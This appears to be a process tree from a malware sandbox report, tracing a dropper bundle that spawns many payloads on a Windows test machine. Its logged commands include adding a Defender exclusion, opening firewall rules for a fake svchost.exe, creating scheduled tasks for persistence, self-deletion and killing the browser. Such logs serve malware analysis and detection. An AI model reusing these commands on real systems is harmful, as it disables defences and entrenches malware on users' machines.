                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1864,7491063861239833755,17021780520356857483,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5624_1860885952" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=2 --mojo-platform-channel-handle=2212 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:2884
                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1864,7491063861239833755,17021780520356857483,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5624_1860885952" --mojo-platform-channel-handle=1956 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:9772
                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1864,7491063861239833755,17021780520356857483,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5624_1860885952" --mojo-platform-channel-handle=1944 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:9496
                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1864,7491063861239833755,17021780520356857483,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5624_1860885952" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1896 /prefetch:2
                                                                                                                                                                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:9016
                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1864,7491063861239833755,17021780520356857483,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5624_1860885952" --mojo-platform-channel-handle=2916 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:9316
                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1864,7491063861239833755,17021780520356857483,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5624_1860885952" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=520 /prefetch:2
                                                                                                                                                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:15912
                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1864,7491063861239833755,17021780520356857483,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5624_1860885952" --mojo-platform-channel-handle=3684 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:16212
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1864,7491063861239833755,17021780520356857483,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5624_1860885952" --mojo-platform-channel-handle=2236 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:224
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1864,7491063861239833755,17021780520356857483,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5624_1860885952" --mojo-platform-channel-handle=1984 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:9612
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1864,7491063861239833755,17021780520356857483,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5624_1860885952" --mojo-platform-channel-handle=2852 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:10544
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1864,7491063861239833755,17021780520356857483,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5624_1860885952" --mojo-platform-channel-handle=2240 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:13032
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c Thu124078ed79bdbd5.exe
                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:4300
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu124078ed79bdbd5.exe
                                                                                                                                                                                                                                                                                                                                                                                    Thu124078ed79bdbd5.exe
                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:4980
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\t387yWN3jW2latLaqDmyZFpN.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\t387yWN3jW2latLaqDmyZFpN.exe"
                                                                                                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:5812
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\PDfBHekEZT5OMx90P2VlexN_.exe
                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\PDfBHekEZT5OMx90P2VlexN_.exe"
                                                                                                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:5236
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im PDfBHekEZT5OMx90P2VlexN_.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\PDfBHekEZT5OMx90P2VlexN_.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:5520
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                  taskkill /im PDfBHekEZT5OMx90P2VlexN_.exe /f
                                                                                                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                  PID:6344
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\GVWxGcTkVG1E9ZlalBgFFCiB.exe
                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\GVWxGcTkVG1E9ZlalBgFFCiB.exe"
                                                                                                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:3596
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\rDuszRYcVapYdiu1d2yWoFFu.exe
                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\rDuszRYcVapYdiu1d2yWoFFu.exe"
                                                                                                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:1840
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1840 -s 660
                                                                                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                    PID:7564
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1840 -s 676
                                                                                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                    PID:7964
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1840 -s 636
                                                                                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                    PID:3680
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1840 -s 700
                                                                                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                    PID:7876
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1840 -s 828
                                                                                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                    PID:4400
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\BfVHPw37ayWYt8A2ISyXPrwE.exe
                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\BfVHPw37ayWYt8A2ISyXPrwE.exe"
                                                                                                                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:5364
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                      schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                      PID:1336
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                      schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                      PID:7324
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\n9phedk_hRTezbT46II1s6bc.exe
                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\n9phedk_hRTezbT46II1s6bc.exe"
                                                                                                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:3564
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:5572
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:7296
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:7356
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                              schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                                                                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                              PID:8096
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\System\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System\svchost.exe" formal
                                                                                                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:8128
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\BzUg549KEPuPomNn7fpJjZ3o.exe
                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\BzUg549KEPuPomNn7fpJjZ3o.exe"
                                                                                                                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:1132
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c Thu1231d30cda84872.exe
                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:3856
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu1231d30cda84872.exe
                                                                                                                                                                                                                                                                                                                                                                                                                Thu1231d30cda84872.exe
                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2444
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6700
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1904
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c Thu120bfbc2443b3b5d.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:428
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu120bfbc2443b3b5d.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      Thu120bfbc2443b3b5d.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2152
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c Thu125e541847539.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4516
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu125e541847539.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          Thu125e541847539.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2204
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-OK50H.tmp\Thu125e541847539.tmp
                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-OK50H.tmp\Thu125e541847539.tmp" /SL5="$502C0,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu125e541847539.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1012
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu125e541847539.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu125e541847539.exe" /SILENT
                                                                                                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5232
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-P5TH0.tmp\Thu125e541847539.tmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-P5TH0.tmp\Thu125e541847539.tmp" /SL5="$6027C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu125e541847539.exe" /SILENT
                                                                                                                                                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5288
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-9OLT9.tmp\postback.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-9OLT9.tmp\postback.exe" ss1
                                                                                                                                                                                                                                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5724
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c Thu12465fe68f85b6156.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:832
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Thu12b275ee70c7e913.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4900
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu12b275ee70c7e913.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Thu12b275ee70c7e913.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2316
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5856
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\inst1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5208
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6124
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\ProgramData\4842156.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\ProgramData\4842156.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3924
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\ProgramData\4063449.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\ProgramData\4063449.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2164
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\ProgramData\6774152.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\ProgramData\6774152.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7332
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\ProgramData\1322331.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\ProgramData\1322331.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7620
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1596
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im Soft1WW02.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7760
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    taskkill /im Soft1WW02.exe /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6468
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    timeout /t 6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6160
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\4.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\4.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4516
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4192
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4500
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 684
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7428
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 836
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7980
